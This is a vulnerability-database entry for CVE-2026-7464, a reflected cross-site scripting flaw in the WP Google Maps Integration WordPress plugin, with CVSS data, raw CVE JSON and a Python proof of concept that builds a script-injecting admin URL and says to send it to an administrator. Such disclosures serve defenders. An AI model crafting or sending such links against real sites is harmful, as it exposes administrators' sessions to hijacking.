Security Vulnerability Report
中文
CVE-2026-7464 CVSS 6.1 MEDIUM

CVE-2026-7464

Published: 2026-05-12 09:16:57
Last Modified: 2026-05-12 14:03:53

Description

The WP Google Maps Integration plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `page` parameter in all versions up to, and including, 1.2. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Google Maps Integration <= 1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (PoC) for CVE-2026-7464 # This script demonstrates how to generate a malicious URL. import urllib.parse def generate_exploit_url(target_domain): # The vulnerable parameter is 'page' # Payload: basic script injection to test execution xss_payload = '"><script>alert(document.cookie)</script>' # Vulnerable endpoint structure based on WordPress admin and plugin files base_url = f"{target_domain}/wp-admin/admin.php" # Construct the parameters params = { "page": xss_payload } # Encode URL full_url = f"{base_url}?{urllib.parse.urlencode(params)}" return full_url # Usage target = "http://example.com" exploit_link = generate_exploit_url(target) print(f"Send this link to an admin: {exploit_link}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7464", "sourceIdentifier": "[email protected]", "published": "2026-05-12T09:16:57.180", "lastModified": "2026-05-12T14:03:52.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Google Maps Integration plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `page` parameter in all versions up to, and including, 1.2. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-google-maps-integration/trunk/admin/partials/category/category-table-display.php#L48", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-google-maps-integration/trunk/admin/partials/map/map-table-display.php#L42", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-google-maps-integration/trunk/admin/partials/marker/marker-table-display.php#L46", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-google-maps-integration/trunk/admin/partials/route/route-table-display.php#L42", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bd9ef48f-b501-4fca-a6a5-78452c316497?source=cve", "source": "[email protected]"}]}}